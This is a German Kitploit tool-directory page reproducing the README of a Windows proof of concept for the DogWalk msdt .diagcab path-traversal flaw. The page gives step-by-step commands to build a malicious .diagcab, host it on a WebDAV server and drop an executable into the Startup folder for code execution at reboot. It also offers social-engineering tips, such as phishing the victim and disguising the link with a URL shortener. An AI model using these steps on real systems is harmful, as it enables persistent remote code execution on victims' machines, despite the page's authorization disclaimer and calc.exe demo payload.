Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
DogWalk-rce-poc — 🐾Dogwalk PoC (nutzt eine diagcab-Datei, um RCE unter Windows zu erzielen) | Kitploit
Tools/GitHubGitHub/ariary/dogwalk-rce-poc
Payload-GenerierungPersistenzmechanismenExploitationPenetrationstests
GitHubariary/dogwalk-rce-poc

DogWalk-rce-poc

🐾Dogwalk PoC (nutzt eine diagcab-Datei, um RCE unter Windows zu erzielen)

Repository anzeigen
7614vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dogwalk Proof-of-Concept🐾

root@kitploit:~

🚨 Haftungsausschluss 🚨



Das PoC ermöglicht es einem Angreifer, Remote-Code-Injection auf einem Windows-Zielgerät durchzuführen.
Ziel dieses Repos ist es, ein PoC noch benutzerfreundlicher zu machen als das <a href=https://github.com/irsl/microsoft-diagcab-rce-poc>ursprüngliche Repo.
NICHT OHNE VORHERIGE GENEHMIGUNG VERWENDEN!

Angesichts des verursachten Schadens und der Einfachheit der Ausnutzung hoffe ich, dass Microsoft es beheben wird
Update Juli 2022: Microsoft hat die Schwachstelle in msdt noch nicht gepatcht, aber Microsoft Defender kann sie erkennen

  • 🧠 Verstehe es
  • 🐾 Führe es aus
  • 📺 Zeig mir

Kernkonzept: Path-Traversal-Schwachstelle in Microsofts Diagcab-Technologie (msdt), die zu Remote-Code-Ausführung führen kann.
Die vollständige Sicherheitsmeldung findest du im Blogbeitrag
Die Schwachstelle wurde seit 2 Jahren (von @irsl) gemeldet und ist immer noch nicht behoben!

Wie funktioniert es?

Das Proof-of-Concept richtet einen WebDAV-Server ein, der eine schädliche .diagcab-Datei hostet, die eine Path-Traversal durchführt, um eine schädliche ausführbare Datei in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup zu schreiben. Wenn eine ausführbare Datei in diesen Ordner geschrieben wird, wird sie bei jedem Start des Windows-Rechners ausgeführt; dies wird als Boot Logon Autostart Execution bezeichnet.

Im Grunde brauchen wir also:

  • WebDAV-Server
  • Schädliche .diagcab-Datei
  • Schädliche ausführbare Datei (eine legitime oder einfache Textdatei genügt für das PoC)

🎬 Szenario

  1. Das Opfer besucht einen Link (Phishing, Social Engineering oder was auch immer), der die .diagcab-Datei herunterlädt

(💡 verwende den Response-Header Content-type: application/octet-stream, damit der Browser die Datei automatisch herunterlädt, wenn die URL aufgerufen wird)

  1. Das Opfer klickt auf den Dateidownload (das kann leicht/versehentlich passieren, wenn man einfach auf den Download-Ordner des Browsers klickt)
  2. Die CAB-Datei lädt die schädliche WebDAV-Datei -> (Path-Traversal) in den Autostart-Ordner herunter
  3. Der Benutzer startet sein Gerät neu -> (RCE)

Los geht's

Wenn du zu faul (oder in Eile) bist, um Schritt für Schritt vorzugehen:

root@kitploit:~
./hurry-dogwalk.sh [WEBDAV_URL]         # need docker
# Stop the server
./hurry-dogwalk.sh --clean

Andernfalls ↓↓

🔨 Erstelle die .diagcab-Datei

  • .diagcfg sind einfache XML-Dateien, die Verweise auf ein oder mehrere Diagnosepakete enthalten und Metainformationen über diese bereitstellen
  • Sie werden in Microsoft-Cabinet-Dateiarchive verpackt und mit der Erweiterung .diagcab gespeichert.

Erstelle zuerst custom.diagcfg:

root@kitploit:~
./build-malicious-diagcfg.sh --url [WEBDAV_URL]

Und erstelle die hotfix895214.diagcab:

root@kitploit:~
cabarc.exe n hotfix895214.diagcab custom.diagcfg
# run it on windows (or with wine). If you do not find carbarc.exe use http://jc.bellamy.free.fr/download/cabarc.exe or http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe

Verschiebe sie schließlich in das Verzeichnis ./webdav/diagcab-webdav-poc/config

🏗️ Richte den Server ein

Lege die ausführbare Datei, die du auf den Opfer-Rechner übertragen möchtest, in das Verzeichnis ./webdav/malicious... (Hier verwenden wir den klassischen calc.exe)

...Und starte den Server:

root@kitploit:~
cd ./webdav/diagcab-webdav-poc/
perl diagcab-webdav-poc.pl

Die schädliche .diagcab-Datei ist unter https://[WEBDAV_URL]/config/hotfix895214.diagcab verfügbar. Du musst nun ein Opfer dazu verleiten, auf diesen Link zu klicken.

(💡 du kannst einen URL-Shortener verwenden, um den Link weniger verdächtig erscheinen zu lassen)

👁️ Warten und sehen

Dogwalk-Einrichtung

💡 standardmäßig scheint die WebDAV-Kommunikation nicht aktiviert zu sein. Siehe mitigations.txt für eine Problemumgehung, um es zum Laufen zu bringen

🐾🐾

demo

Tool herunterladen